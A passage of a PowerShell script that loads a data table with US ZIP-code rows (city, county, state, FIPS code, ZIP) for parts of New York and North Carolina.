$Cities.Rows.Add("Waverly","Tioga","New york","NY","36","14892") + $null = $Cities.Rows.Add("Wellsburg","Chemung","New york","NY","36","14894") + $null = $Cities.Rows.Add("Wellsville","Allegany","New york","NY","36","14895") + $null = $Cities.Rows.Add("Whitesville","Allegany","New york","NY","36","14897") + $null = $Cities.Rows.Add("Woodhull","Steuben","New york","NY","36","14898") + $null = $Cities.Rows.Add("Zcta 148hh","Chemung","New york","NY","36","148HH") + $null = $Cities.Rows.Add("Elmira","Chemung","New york","NY","36","14901") + $null = $Cities.Rows.Add("Elmira heights","Chemung","New york","NY","36","14903") + $null = $Cities.Rows.Add("Elmira","Chemung","New york","NY","36","14904") + $null = $Cities.Rows.Add("Elmira","Chemung","New york","NY","36","14905") + $null = $Cities.Rows.Add("Zcta 149hh","Chemung","New york","NY","36","149HH") + $null = $Cities.Rows.Add("Advance","Davie","North carolina","NC","37","27006") + $null = $Cities.Rows.Add("Ararat","Surry","North carolina","NC","37","27007") + $null = $Cities.Rows.Add("Belews creek","Forsyth","North carolina","NC","37","27009") + $null = $Cities.Rows.Add("Boonville","Yadkin","North carolina","NC","37","27011") + $null = $Cities.Rows.Add("Clemmons","Forsyth","North carolina","NC","37","27012") + $null = $Cities.Rows.Add("Cleveland","Rowan","North carolina","NC","37","27013") + $null = $Cities.Rows.Add("Cooleemee","Davie","North carolina","NC","37","27014") + $null = $Cities.Rows.Add("Danbury","Stokes","North carolina","NC","37","27016") + $null = $Cities.Rows.Add("Dobson","Surry","North carolina","NC","37","27017") + $null = $Cities.Rows.Add("East bend","Yadkin","North carolina","NC","37","27018") + $null = $Cities.Rows.Add("Germanton","Stokes","North carolina","NC","37","27019") + $null = $Cities.Rows.Add("Hamptonville","Yadkin","North carolina","NC","37","27020") + $null = $Cities.Rows.Add("King","Stokes","North carolina","NC","37","27021") + $null = $Cities.Rows.Add("Lawsonville","Stokes","North carolina","NC","37","27022") + $null = $Cities.Rows.Add("Lewisville","Forsyth","North carolina","NC","37","27023") + $null = $Cities.Rows.Add("Lowgap","Surry","North carolina","NC","37","27024") + $null = $Cities.Rows.Add("Madison","Rockingham","North carolina","NC","37","27025") + $null = $Cities.Rows.Add("Mayodan","Rockingham","North carolina","NC","37","27027") + $null = $Cities.Rows.Add("Mocksville","Davie","North carolina","NC","37","27028") + $null = $Cities.Rows.Add("Mount airy","Surry","North carolina","NC","37","27030") + $null = $Cities.Rows.Add("Pfafftown","Forsyth","North carolina","NC","37","27040") + $null = $Cities.Rows.Add("Pilot mountain","Surry","North carolina","NC","37","27041") + $null = $Cities.Rows.Add("Pine hall","Stokes","North carolina","NC","37","27042") + $null = $Cities.Rows.Add("Pinnacle","Stokes","North carolina","NC","37","27043") + $null = $Cities.Rows.Add("Rural hall","Forsyth","North carolina","NC","37","27045") + $null = $Cities.Rows.Add("Sandy ridge","Stokes","North carolina","NC","37","27046") + $null = $Cities.Rows.Add("Siloam","Surry","North carolina","NC","37","27047") + $null = $Cities.Rows.Add("Stoneville","Rockingham","North carolina","NC","37","27048") + $null = $Cities.Rows.Add("Tobaccoville","Forsyth","North carolina","NC","37","27050") + $null = $Cities.Rows.Add("Walkertown","Forsyth","North carolina","NC","37","27051") + $null = $Cities.Rows.Add("Walnut cove","Stokes","North carolina","NC","37","27052") + $null = $Cities.Rows.Add("Westfield","Stokes","North carolina","NC","37","27053") + $null = $Cities.Rows.Add("Woodleaf","Rowan","North carolina","NC","37","27054") + $null = $Cities.Rows.Add("Yadkinville","Yadkin","North carolina","NC","37","27055") + $null = $Cities.Rows.Add("Zcta 270hh","Davidson","North carolina","NC","37","270HH") + $null = $Cities.Rows.Add("Winston salem","Forsyth","North carolina","NC","37","27101") + $null = $Cities.Rows.Add("Winston salem","Forsyth","North carolina","NC","37","27103") + $null = $Cities.Rows.Add("Winston salem","Forsyth","North carolina","NC","37","27104") + $null = $Cities.Rows.Add("Winston salem","Forsyth","North carolina","NC","37","27105") + $null = $Cities.Rows.Add("Winston salem","Forsyth","North carolina","NC","37","27106") + $null = $Cities.Rows.Add("Winston salem","Forsyth","North carolina","NC","37","27107") + $null = $Cities.Rows.Add("Winston salem","Forsyth","North carolina","NC","37","27109") + $null = $Cities.Rows.Add("Winston salem","Forsyth","North carolina","NC","37","27127") + $null = $Cities.Rows.Add("Zcta 271hh","Davidson","North carolina","NC","37","271HH") + $null = $Cities.Rows.Add("Altamahaw","Alamance","North carolina","NC","37","27202") + $null = $Cities.Rows.Add("Farmer","Randolph","North carolina","NC","37","27203") + $null = $Cities.Rows.Add("Bear creek","Chatham","North carolina","NC","37","27207") + $null = $Cities.Rows.Add("Bennett","Chatham","North carolina","NC","37","27208") + $null = $Cities.Rows.Add("Biscoe","Montgomery","North carolina","NC","37","27209") + $null = $Cities.Rows.Add("Blanch","Caswell","North carolina","NC","37","27212") + $null = $Cities.Rows.Add("Browns summit","Guilford","North carolina","NC","37","27214") + $null = $Cities.Rows.Add("Glen raven","Alamance","North carolina","NC","37","27215") + $null = $Cities.Rows.Add("Burlington","Alamance","North carolina","NC","37","27217") + $null = $Cities.Rows.Add("Candor","Montgomery","North carolina","NC","37","27229") + $null = $Cities.Rows.Add("Cedar grove","Orange","North carolina","NC","37","27231") + $null = $Cities.Rows.Add("Climax","Randolph","North carolina","NC","37","27233") + $null = $Cities.Rows.Add("Colfax","Guilford","North carolina","NC","37","27235") + $null = $Cities.Rows.Add("Denton","Davidson","North carolina","NC","37","27239") + $null = $Cities.Rows.Add("Eagle springs","Moore","North carolina","NC","37","27242") + $null = $Cities.Rows.Add("Efland","Orange","North carolina","NC","37","27243") + $null = $Cities.Rows.Add("Elon college","Alamance","North carolina","NC","37","27244") + $null = $Cities.Rows.Add("Franklinville","Randolph","North carolina","NC","37","27248") + $null = $Cities.Rows.Add("Gibsonville","Guilford","North carolina","NC","37","27249") + $null = $Cities.Rows.Add("Goldston","Chatham","North carolina","NC","37","27252") + $null = $Cities.Rows.Add("Graham","Alamance","North carolina","NC","37","27253") + $null = $Cities.Rows.Add("Gulf","Chatham","North carolina","NC","37","27256") + $null = $Cities.Rows.Add("Haw river","Alamance","North carolina","NC","37","27258") + $null = $Cities.Rows.Add("High point","Guilford","North carolina","NC","37","27260") + $null = $Cities.Rows.Add("High point","Guilford","North carolina","NC","37","27262") + $null = $Cities.Rows.Add("Archdale","Randolph","North carolina","NC","37","27263") + $null = $Cities.Rows.Add("High point","Guilford","North carolina","NC","37","27265") + $null = $Cities.Rows.Add("Hillsborough","Orange","North carolina","NC","37","27278") + $null = $Cities.Rows.Add("Jackson springs","Moore","North carolina","NC","37","27281") + $null = $Cities.Rows.Add("Jamestown","Guilford","North carolina","NC","37","27282") + $null = $Cities.Rows.Add("Julian","Guilford","North carolina","NC","37","27283") + $null = $Cities.Rows.Add("Kernersville","Forsyth","North carolina","NC","37","27284") + $null = $Cities.Rows.Add("Eden","Rockingham","North carolina","NC","37","27288") + $null = $Cities.Rows.Add("Leasburg","Caswell","North carolina","NC","37","27291") + $null = $Cities.Rows.Add("Lexington","Davidson","North carolina","NC","37","27292") + $null = $Cities.Rows.Add("Zcta 27295","Davidson","North carolina","NC","37","27295") + $null = $Cities.Rows.Add("Liberty","Randolph","North carolina","NC","37","27298") + $null = $Cities.Rows.Add("Linwood","Davidson","North carolina","NC","37","27299") + $null = $Cities.Rows.Add("Zcta 272hh","Alamance","North carolina","NC","37","272HH") + $null = $Cities.Rows.Add("Mc leansville","Guilford","North carolina","NC","37","27301") + $null = $Cities.Rows.Add("Mebane","Alamance","North carolina","NC","37","27302") + $null = $Cities.Rows.Add("Milton","Caswell","North carolina","NC","37","27305") + $null = $Cities.Rows.Add("Mount gilead","Montgomery","North carolina","NC","37","27306") + $null = $Cities.Rows.Add("Oak ridge","Guilford","North carolina","NC","37","27310") + $null = $Cities.Rows.Add("Pelham","Caswell","North carolina","NC","37","27311") + $null = $Cities.Rows.Add("Pittsboro","Chatham","North carolina","NC","37","27312") + $null = $Cities.Rows.Add("Pleasant garden","Guilford","North carolina","NC","37","27313") + $null = $Cities.Rows.Add("Prospect hill","Caswell","North carolina","NC","37","27314") + $null = $Cities.Rows.Add("Providence","Caswell","North carolina","NC","37","27315") + $null = $Cities.Rows.Add("Coleridge","Randolph","North carolina","NC","37","27316") + $null = $Cities.Rows.Add("Randleman","Randolph","North carolina","NC","37","27317") + $null = $Cities.Rows.Add("Reidsville","Rockingham","North carolina","NC","37","27320") + $null = $Cities.Rows.Add("Robbins","Moore","North carolina","NC","37","27325") + $null = $Cities.Rows.Add("Ruffin","Rockingham","North carolina","NC","37","27326") + $null = $Cities.Rows.Add("Colon","Lee","North carolina","NC","37","27330") + $null = $Cities.Rows.Add("Seagrove","Randolph","North carolina","NC","37","27341") + $null = $Cities.Rows.Add("Sedalia","Guilford","North carolina","NC","37","27342") + $null = $Cities.Rows.Add("Semora","Person","North carolina","NC","37","27343") + $null = $Cities.Rows.Add("Siler city","Chatham","North carolina","NC","37","27344") + $null = $Cities.Rows.Add("Snow camp","Alamance","North carolina","NC","37","27349") + $null = $Cities.Rows.Add("Sophia","Randolph","North carolina","NC","37","27350") + $null = $Cities.Rows.Add("Staley","Randolph","North carolina","NC","37","27355") + $null = $Cities.Rows.Add("Star","Montgomery","North carolina","NC","37","27356") + $null = $Cities.Rows.Add("Stokesdale","Rockingham","North carolina","NC","37","27357") + $null = $Cities.Rows.Add("Summerfield","Guilford","North carolina","NC","37","27358") + $null = $Cities.Rows.Add("Thomasville","Davidson","North carolina","NC","37","27360") + $null = $Cities.Rows.Add("Trinity","Randolph","North carolina","NC","37","27370") + $null = $Cities.Rows.Add("Troy","Montgomery","North carolina","NC","37","27371") + $null = $Cities.Rows.Add("West end","Moore","North carolina","NC","37","27376") + $null = $Cities.Rows.Add("Whitsett","Guilford","North carolina","NC","37","27377") + $null = $Cities.Rows.Add("Yanceyville","Caswell","North carolina","NC","37","27379") + $null = $Cities.Rows.Add("Zcta 273hh","Alamance","North carolina","NC","37","273HH") + $null = $Cities.Rows.Add("Greensboro","Guilford","North carolina","NC","37","27401") + $null = $Cities.Rows.Add("Greensboro","Guilford","North carolina","NC","37","27403") + $null = $Cities.Rows.Add("Greensboro","Guilford","North carolina","NC","37","27405") + $null = $Cities.Rows.Add("Greensboro","Guilford","North carolina","NC","37","27406") + $null = $Cities.Rows.Add("Greensboro","Guilford","North carolina","NC","37","27407") + $null = $Cities.Rows.Add("Greensboro","Guilford","North carolina","NC","37","27408") + $null = $Cities.Rows.Add("Greensboro","Guilford","North carolina","NC","37","27409") + $null = $Cities.Rows.Add("Greensboro","Guilford","North carolina","NC","37","27410") + $null = $Cities.Rows.Add("Greensboro","Guilford","North carolina","NC","37","27455") + $null = $Cities.Rows.Add("Zcta 274hh","Guilford","North carolina","NC","37","274HH") + $null = $Cities.Rows.Add("Angier","Harnett","North carolina","NC","37","27501") + $null = $Cities.Rows.Add("Apex","Wake","North carolina","NC","37","27502") + $null = $Cities.Rows.Add("Bahama","Durham","North carolina","NC","37","27503") + $null = $Cities.Rows.Add("Benson","Johnston","North carolina","NC","37","27504") + $null = $Cities.Rows.Add("Broadway","Harnett","North carolina","NC","37","27505") + $null = $Cities.Rows.Add("Buies creek","Harnett","North carolina","NC","37","27506") + $null = $Cities.Rows.Add("Bullock","Granville","North carolina","NC","37","27507") + $null = $Cities.Rows.Add("Bunn","Franklin","North carolina","NC","37","27508") + $null = $Cities.Rows.Add("Butner","Granville","North carolina","NC","37","27509") + $null = $Cities.Rows.Add("Carrboro","Orange","North carolina","NC","37","27510") + $null = $Cities.Rows.Add("Cary","Wake","North carolina","NC","37","27511") + $null = $Cities.Rows.Add("Cary","Wake","North carolina","NC","37","27513") + $null = $Cities.Rows.Add("Chapel hill","Orange","North carolina","NC","37","27514") + $null = $Cities.Rows.Add("Chapel hill","Orange","North carolina","NC","37","27516") + $null = $Cities.Rows.Add("Clayton","Johnston","North carolina","NC","37","27520") + $null = $Cities.Rows.Add("Coats","Harnett","North carolina","NC","37","27521") + $null = $Cities.Rows.Add("Creedmoor","Granville","North carolina","NC","37","27522") + $null = $Cities.Rows.Add("Four oaks","Johnston","North carolina","NC","37","27524") + $null = $Cities.Rows.Add("Franklinton","Franklin","North carolina","NC","37","27525") + $null = $Cities.Rows.Add("Fuquay varina","Wake","North carolina","NC","37","27526") + $null = $Cities.Rows.Add("Garner","Wake","North carolina","NC","37","27529") + $null = $Cities.Rows.Add("Grantham","Wayne","North carolina","NC","37","27530") + $null = $Cities.Rows.Add("Goldsboro","Wayne","North carolina","NC","37","27534") + $null = $Cities.Rows.Add("Henderson","Vance","North carolina","NC","37","27536") + $null = $Cities.Rows.Add("Holly springs","Wake","North carolina","NC","37","27540") + $null = $Cities.Rows.Add("Hurdle mills","Person","North carolina","NC","37","27541") + $null = $Cities.Rows.Add("Kenly","Johnston","North carolina","NC","37","27542") + $null = $Cities.Rows.Add("Kittrell","Vance","North carolina","NC","37","27544") + $null = $Cities.Rows.Add("Knightdale","Wake","North carolina","NC","37","27545") + $null = $Cities.Rows.Add("Lillington","Harnett","North carolina","NC","37","27546") + $null = $Cities.Rows.Add("Louisburg","Franklin","North carolina","NC","37","27549") + $null = $Cities.Rows.Add("Macon","Warren","North carolina","NC","37","27551") + $null = $Cities.Rows.Add("Manson","Warren","North carolina","NC","37","27553") + $null = $Cities.Rows.Add("Micro","Johnston","North carolina","NC","37","27555") + $null = $Cities.Rows.Add("Middlesex","Nash","North carolina","NC","37","27557") + $null = $Cities.Rows.Add("Moncure","Chatham","North carolina","NC","37","27559") + $null = $Cities.Rows.Add("Morrisville","Wake","North carolina","NC","37","27560") + $null = $Cities.Rows.Add("New hill","Wake","North carolina","NC","37","27562") + $null = $Cities.Rows.Add("Norlina","Warren","North carolina","NC","37","27563") + $null = $Cities.Rows.Add("Oxford","Granville","North carolina","NC","37","27565") + $null = $Cities.Rows.Add("Pine level","Johnston","North carolina","NC","37","27568") + $null = $Cities.Rows.Add("Princeton","Johnston","North carolina","NC","37","27569") + $null = $Cities.Rows.Add("Ridgeway","Warren","North carolina","NC","37","27570") + $null = $Cities.Rows.Add("Rolesville","Wake","North carolina","NC","37","27571") + $null = $Cities.Rows.Add("Rougemont","Person","North carolina","NC","37","27572") + $null = $Cities.Rows.Add("Roxboro","Person","North carolina","NC","37","27573") + $null = $Cities.Rows.Add("Selma","Johnston","North carolina","NC","37","27576") + $null = $Cities.Rows.Add("Smithfield","Johnston","North carolina","NC","37","27577") + $null = $Cities.Rows.Add("Stem","Granville","North carolina","NC","37","27581") + $null = $Cities.Rows.Add("Stovall","Granville","North carolina","NC","37","27582") + $null = $Cities.Rows.Add("Timberlake","Person","North carolina","NC","37","27583") + $null = $Cities.Rows.Add("Townsville","Vance","North carolina","NC","37","27584") + $null = $Cities.Rows.Add("Wake forest","Wake","North carolina","NC","37","27587") + $null = $Cities.Rows.Add("Warrenton","Warren","North carolina","NC","37","27589") + $null = $Cities.Rows.Add("Wendell","Wake","North carolina","NC","37","27591") + $null = $Cities.Rows.Add("Willow spring","Wake","North carolina","NC","37","27592") + $null = $Cities.Rows.Add("Youngsville","Franklin","North carolina","NC","37","27596") + $null = $Cities.Rows.Add("Zebulon","Wake","North carolina","NC","37","27597") + $null = $Cities.Rows.Add("Zcta 275hh","Chatham","North carolina","NC","37","275HH") + $null = $Cities.Rows.Add("Raleigh","Wake","North carolina","NC","37","27601") + $null = $Cities.Rows.Add("Raleigh","Wake","North carolina","NC","37","27603") + $null = $Cities.Rows.Add("Raleigh","Wake","North carolina","NC","37","27604") + $null = $Cities.Rows.Add("Raleigh","Wake","North carolina","NC","37","27605") + $null = $Cities.Rows.Add("Raleigh","Wake","North carolina","NC","37","27606") + $null = $Cities.Rows.Add("Raleigh","Wake","North carolina","NC","37","27607") + $null = $Cities.Rows.Add("Raleigh","Wake","North carolina","NC","37","27608") + $null = $Cities.Rows.Add("Raleigh","Wake","North carolina","NC","37","27609") + $null = $Cities.Rows.Add("Raleigh","Wake","North carolina","NC","37","27610") + $null = $Cities.Rows.Add("Raleigh","Wake","North carolina","NC","37","27612") + $null = $Cities.Rows.Add("Raleigh","Wake","North carolina","NC","37","27613") + $null = $Cities.Rows.Add("Raleigh","Wake","North carolina","NC","37","27614") + $null = $Cities.Rows.Add("Raleigh","Wake","North carolina","NC","37","27615") + $null = $Cities.Rows.Add("Raleigh","Wake","North carolina","NC","37","27616") + $null = $Cities.Rows.Add("Zcta 276hh","Wake","North carolina","NC","37","276HH") + $null = $Cities.Rows.Add("Durham","Durham","North carolina","NC","37","27701") + $null = $Cities.Rows.Add("Durham","Durham","North carolina","NC","37","27703") + $null = $Cities.Rows.Add("Durham","Durham","North carolina","NC","37","27704") + $null = $Cities.Rows.Add("Durham","Durham","North carolina","NC","37","27705") + $null = $Cities.Rows.Add("Durham","Durham","North carolina","NC","37","27706") + $null = $Cities.Rows.Add("Durham","Durham","North carolina","NC","37","27707") + $null = $Cities.Rows.Add("Durham","Durham","North carolina","NC","37","27712") + $null = $Cities.Rows.Add("Research triangl","Durham","North carolina","NC","37","27713") + $null = $Cities.Rows.Add("Zcta 277hh","Durham","North carolina","NC","37","277HH") + $null = $Cities.Rows.Add("Rocky mount","Edgecombe","North carolina","NC","37","27801") + $null = $Cities.Rows.Add("Rocky mount","Nash","North carolina","NC","37","27803") + $null = $Cities.Rows.Add("Wesleyan college","Nash","North carolina","NC","37","27804") + $null = $Cities.Rows.Add("Aulander","Bertie","North carolina","NC","37","27805") + $null = $Cities.Rows.Add("Aurora","Beaufort","North carolina","NC","37","27806") + $null = $Cities.Rows.Add("Bailey","Nash","North carolina","NC","37","27807") + $null = $Cities.Rows.Add("Bath","Beaufort","North carolina","NC","37","27808") + $null = $Cities.Rows.Add("Battleboro","Edgecombe","North carolina","NC","37","27809") + $null = $Cities.Rows.Add("Belhaven","Beaufort","North carolina","NC","37","27810") + $null = $Cities.Rows.Add("Bethel","Pitt","North carolina","NC","37","27812") + $null = $Cities.Rows.Add("Black creek","Wilson","North carolina","NC","37","27813") + $null = $Cities.Rows.Add("Blounts creek","Beaufort","North carolina","NC","37","27814") + $null = $Cities.Rows.Add("Castalia","Nash","North carolina","NC","37","27816") + $null = $Cities.Rows.Add("Chocowinity","Beaufort","North carolina","NC","37","27817") + $null = $Cities.Rows.Add("Como","Hertford","North carolina","NC","37","27818") + $null = $Cities.Rows.Add("Conetoe","Edgecombe","North carolina","NC","37","27819") + $null = $Cities.Rows.Add("Conway","Northampton","North carolina","NC","37","27820") + $null = $Cities.Rows.Add("Edward","Beaufort","North carolina","NC","37","27821") + $null = $Cities.Rows.Add("Elm city","Wilson","North carolina","NC","37","27822") + $null = $Cities.Rows.Add("Enfield","Halifax","North carolina","NC","37","27823") + $null = $Cities.Rows.Add("Middletown","Hyde","North carolina","NC","37","27824") + $null = $Cities.Rows.Add("Fairfield","Hyde","North carolina","NC","37","27826") + $null = $Cities.Rows.Add("Falkland","Pitt","North carolina","NC","37","27827") + $null = $Cities.Rows.Add("Farmville","Pitt","North carolina","NC","37","27828") + $null = $Cities.Rows.Add("Fountain","Pitt","North carolina","NC","37","27829") + $null = $Cities.Rows.Add("Eureka","Wayne","North carolina","NC","37","27830") + $null = $Cities.Rows.Add("Garysburg","Northampton","North carolina","NC","37","27831") + $null = $Cities.Rows.Add("Gaston","Northampton","North carolina","NC","37","27832") + $null = $Cities.Rows.Add("Greenville","Pitt","North carolina","NC","37","27834") + $null = $Cities.Rows.Add("Grimesland","Pitt","North carolina","NC","37","27837") + $null = $Cities.Rows.Add("Halifax","Halifax","North carolina","NC","37","27839") + $null = $Cities.Rows.Add("Hamilton","Martin","North carolina","NC","37","27840") + $null = $Cities.Rows.Add("Hassell","Martin","North carolina","NC","37","27841") + $null = $Cities.Rows.Add("Henrico","Northampton","North carolina","NC","37","27842") + $null = $Cities.Rows.Add("Hobgood","Halifax","North carolina","NC","37","27843") + $null = $Cities.Rows.Add("Hollister","Halifax","North carolina","NC","37","27844") + $null = $Cities.Rows.Add("Jackson","Northampton","North carolina","NC","37","27845") + $null = $Cities.Rows.Add("Jamesville","Martin","North carolina","NC","37","27846") + $null = $Cities.Rows.Add("Kelford","Bertie","North carolina","NC","37","27847") + $null = $Cities.Rows.Add("Lewiston woodvil","Bertie","North carolina","NC","37","27849") + $null = $Cities.Rows.Add("Littleton","Halifax","North carolina","NC","37","27850") + $null = $Cities.Rows.Add("Lucama","Wilson","North carolina","NC","37","27851") + $null = $Cities.Rows.Add("Crisp","Edgecombe","North carolina","NC","37","27852") + $null = $Cities.Rows.Add("Margarettsville","Northampton","North carolina","NC","37","27853") + $null = $Cities.Rows.Add("Murfreesboro","Hertford","North carolina","NC","37","27855") + $null = $Cities.Rows.Add("Nashville","Nash","North carolina","NC","37","27856") + $null = $Cities.Rows.Add("Oak city","Martin","North carolina","NC","37","27857") + $null = $Cities.Rows.Add("Greenville","Pitt","North carolina","NC","37","27858") + $null = $Cities.Rows.Add("Pantego","Beaufort","North carolina","NC","37","27860") + $null = $Cities.Rows.Add("Pendleton","Northampton","North carolina","NC","37","27862") + $null = $Cities.Rows.Add("Pikeville","Wayne","North carolina","NC","37","27863") + $null = $Cities.Rows.Add("Pinetops","Edgecombe","North carolina","NC","37","27864") + $null = $Cities.Rows.Add("Pinetown","Beaufort","North carolina","NC","37","27865") + $null = $Cities.Rows.Add("Pleasant hill","Northampton","North carolina","NC","37","27866") + $null = $Cities.Rows.Add("Rich square","Northampton","North carolina","NC","37","27869") + $null = $Cities.Rows.Add("Roanoke rapids","Halifax","North carolina","NC","37","27870") + $null = $Cities.Rows.Add("Robersonville","Martin","North carolina","NC","37","27871") + $null = $Cities.Rows.Add("Roxobel","Bertie","North carolina","NC","37","27872") + $null = $Cities.Rows.Add("Saratoga","Wilson","North carolina","NC","37","27873") + $null = $Cities.Rows.Add("Scotland neck","Halifax","North carolina","NC","37","27874") + $null = $Cities.Rows.Add("Scranton","Hyde","North carolina","NC","37","27875") + $null = $Cities.Rows.Add("Seaboard","Northampton","North carolina","NC","37","27876") + $null = $Cities.Rows.Add("Severn","Northampton","North carolina","NC","37","27877") + $null = $Cities.Rows.Add("Sharpsburg","Nash","North carolina","NC","37","27878") + $null = $Cities.Rows.Add("Sims","Wilson","North carolina","NC","37","27880") + $null = $Cities.Rows.Add("Spring hope","Nash","North carolina","NC","37","27882") + $null = $Cities.Rows.Add("Stantonsburg","Wilson","North carolina","NC","37","27883") + $null = $Cities.Rows.Add("Stokes","Pitt","North carolina","NC","37","27884") + $null = $Cities.Rows.Add("Swanquarter","Hyde","North carolina","NC","37","27885") + $null = $Cities.Rows.Add("Tarboro","Edgecombe","North carolina","NC","37","27886") + $null = $Cities.Rows.Add("Walstonburg","Greene","North carolina","NC","37","27888") + $null = $Cities.Rows.Add("Washington","Beaufort","North carolina","NC","37","27889") + $null = $Cities.Rows.Add("Weldon","Halifax","North carolina","NC","37","27890") + $null = $Cities.Rows.Add("Whitakers","Nash","North carolina","NC","37","27891") + $null = $Cities.Rows.Add("Williamston","Martin","North carolina","NC","37","27892") + $null = $Cities.Rows.Add("Wilson","Wilson","North carolina","NC","37","27893") + $null = $Cities.Rows.Add("Wilson","Wilson","North carolina","NC","37","27896") + $null = $Cities.Rows.Add("George","Northampton","North carolina","NC","37","27897") + $null = $Cities.Rows.Add("Zcta 278hh","Beaufort","North carolina","NC","37","278HH") + $null = $Cities.Rows.Add("Zcta 278xx","Beaufort","North carolina","NC","37","278XX") + $null = $Cities.Rows.Add("Elizabeth city","Pasquotank","North carolina","NC","37","27909") + $null = $Cities.Rows.Add("Ahoskie","Hertford","North carolina","NC","37","27910") + $null = $Cities.Rows.Add("Avon","Dare","North carolina","NC","37","27915") + $null = $Cities.Rows.Add("Aydlett","Currituck","North carolina","NC","37","27916") + $null = $Cities.Rows.Add("Barco","Currituck","North carolina","NC","37","27917") + $null = $Cities.Rows.Add("Belvidere","Perquimans","North carolina","NC","37","27919") + $null = $Cities.Rows.Add("Buxton","Dare","North carolina","NC","37","27920") + $null = $Cities.Rows.Add("Camden","Camden","North carolina","NC","37","27921") + $null = $Cities.Rows.Add("Cofield","Hertford","North carolina","NC","37","27922") + $null = $Cities.Rows.Add("Coinjock","Currituck","North carolina","NC","37","27923") + $null = $Cities.Rows.Add("Colerain","Bertie","North carolina","NC","37","27924") + $null = $Cities.Rows.Add("Columbia","Tyrrell","North carolina","NC","37","27925") + $null = $Cities.Rows.Add("Corapeake","Gates","North carolina","NC","37","27926") + $null = $Cities.Rows.Add("Corolla","Currituck","North carolina","NC","37","27927") + $null = $Cities.Rows.Add("Creswell","Washington","North carolina","NC","37","27928") + $null = $Cities.Rows.Add("Currituck","Currituck","North carolina","NC","37","27929") + $null = $Cities.Rows.Add("Edenton","Chowan","North carolina","NC","37","27932") + $null = $Cities.Rows.Add("Eure","Gates","North carolina","NC","37","27935") + $null = $Cities.Rows.Add("Frisco","Dare","North carolina","NC","37","27936") + $null = $Cities.Rows.Add("Gates","Gates","North carolina","NC","37","27937") + $null = $Cities.Rows.Add("Gatesville","Gates","North carolina","NC","37","27938") + $null = $Cities.Rows.Add("Grandy","Currituck","North carolina","NC","37","27939") + $null = $Cities.Rows.Add("Harbinger","Currituck","North carolina","NC","37","27941") + $null = $Cities.Rows.Add("Harrellsville","Hertford","North carolina","NC","37","27942") + $null = $Cities.Rows.Add("Hatteras","Dare","North carolina","NC","37","27943") + $null = $Cities.Rows.Add("Durants neck","Perquimans","North carolina","NC","37","27944") + $null = $Cities.Rows.Add("Hobbsville","Gates","North carolina","NC","37","27946") + $null = $Cities.Rows.Add("Jarvisburg","Currituck","North carolina","NC","37","27947") + $null = $Cities.Rows.Add("Kill devil hills","Dare","North carolina","NC","37","27948") + $null = $Cities.Rows.Add("Southern shores","Dare","North carolina","NC","37","27949") + $null = $Cities.Rows.Add("Knotts island","Currituck","North carolina","NC","37","27950") + $null = $Cities.Rows.Add("East lake","Dare","North carolina","NC","37","27953") + $null = $Cities.Rows.Add("Manteo","Dare","North carolina","NC","37","27954") + $null = $Cities.Rows.Add("Maple","Currituck","North carolina","NC","37","27956") + $null = $Cities.Rows.Add("Merry hill","Bertie","North carolina","NC","37","27957") + $null = $Cities.Rows.Add("Moyock","Currituck","North carolina","NC","37","27958") + $null = $Cities.Rows.Add("Nags head","Dare","North carolina","NC","37","27959") + $null = $Cities.Rows.Add("Ocracoke","Hyde","North carolina","NC","37","27960") + $null = $Cities.Rows.Add("Plymouth","Washington","North carolina","NC","37","27962") + $null = $Cities.Rows.Add("Point harbor","Currituck","North carolina","NC","37","27964") + $null = $Cities.Rows.Add("Poplar branch","Currituck","North carolina","NC","37","27965") + $null = $Cities.Rows.Add("Powells point","Currituck","North carolina","NC","37","27966") + $null = $Cities.Rows.Add("Powellsville","Bertie","North carolina","NC","37","27967") + $null = $Cities.Rows.Add("Rodanthe","Dare","North carolina","NC","37","27968") + $null = $Cities.Rows.Add("Roper","Washington","North carolina","NC","37","27970") + $null = $Cities.Rows.Add("Salvo","Dare","North carolina","NC","37","27972") + $null = $Cities.Rows.Add("Shawboro","Currituck","North carolina","NC","37","27973") + $null = $Cities.Rows.Add("Shiloh","Camden","North carolina","NC","37","27974") + $null = $Cities.Rows.Add("South mills","Camden","North carolina","NC","37","27976") + $null = $Cities.Rows.Add("Sunbury","Gates","North carolina","NC","37","27979") + $null = $Cities.Rows.Add("Tyner","Chowan","North carolina","NC","37","27980") + $null = $Cities.Rows.Add("Wanchese","Dare","North carolina","NC","37","27981") + $null = $Cities.Rows.Add("Waves","Dare","North carolina","NC","37","27982") + $null = $Cities.Rows.Add("Windsor","Bertie","North carolina","NC","37","27983") + $null = $Cities.Rows.Add("Winfall","Perquimans","North carolina","NC","37","27985") + $null = $Cities.Rows.Add("Winton","Hertford","North carolina","NC","37","27986") + $null = $Cities.Rows.Add("Zcta 279hh","Bertie","North carolina","NC","37","279HH") + $null = $Cities.Rows.Add("Zcta 279xx","Pasquotank","North carolina","NC","37","279XX") + $null = $Cities.Rows.Add("Albemarle","Stanly","North carolina","NC","37","28001") + $null = $Cities.Rows.Add("Alexis","Gaston","North carolina","NC","37","28006") + $null = $Cities.Rows.Add("Ansonville","Anson","North carolina","NC","37","28007") + $null = $Cities.Rows.Add("Badin","Stanly","North carolina","NC","37","28009") + $null = $Cities.Rows.Add("Belmont","Gaston","North carolina","NC","37","28012") + $null = $Cities.Rows.Add("Bessemer city","Gaston","North carolina","NC","37","28016") + $null = $Cities.Rows.Add("Gardner webb col","Cleveland","North carolina","NC","37","28017") + $null = $Cities.Rows.Add("Bostic","Rutherford","North carolina","NC","37","28018") + $null = $Cities.Rows.Add("Caroleen","Rutherford","North carolina","NC","37","28019") + $null = $Cities.Rows.Add("Casar","Cleveland","North carolina","NC","37","28020") + $null = $Cities.Rows.Add("Cherryville","Gaston","North carolina","NC","37","28021") + $null = $Cities.Rows.Add("China grove","Rowan","North carolina","NC","37","28023") + $null = $Cities.Rows.Add("Concord","Cabarrus","North carolina","NC","37","28025") + $null = $Cities.Rows.Add("Concord","Cabarrus","North carolina","NC","37","28027") + $null = $Cities.Rows.Add("Cornelius","Mecklenburg","North carolina","NC","37","28031") + $null = $Cities.Rows.Add("Cramerton","Gaston","North carolina","NC","37","28032") + $null = $Cities.Rows.Add("Crouse","Lincoln","North carolina","NC","37","28033") + $null = $Cities.Rows.Add("Dallas","Gaston","North carolina","NC","37","28034") + $null = $Cities.Rows.Add("Cornelius","Mecklenburg","North carolina","NC","37","28036") + $null = $Cities.Rows.Add("Denver","Lincoln","North carolina","NC","37","28037") + $null = $Cities.Rows.Add("Earl","Cleveland","North carolina","NC","37","28038") + $null = 